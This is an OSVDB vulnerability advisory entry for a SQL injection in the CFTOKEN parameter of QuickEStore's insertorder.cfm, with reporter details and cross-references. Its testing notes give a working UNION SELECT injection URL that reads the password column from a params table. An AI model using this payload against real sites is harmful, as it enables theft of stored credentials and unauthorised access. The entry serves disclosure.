QuickEStore insertorder.cfm CFTOKEN Variable SQL Injection

2007-07-18T17:07:11
ID OSVDB:36358
Type osvdb
Reporter meoconx (meoconx[at]vnbrain.net)
Modified 2007-07-18T17:07:11

Description

Manual Testing Notes

http://[target]/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

References:

Secunia Advisory ID: 26097
Other Advisory URL: http://milw0rm.com/exploits/4193
ISS X-Force ID: 35463
CVE-2007-3933
Bugtraq ID: 24961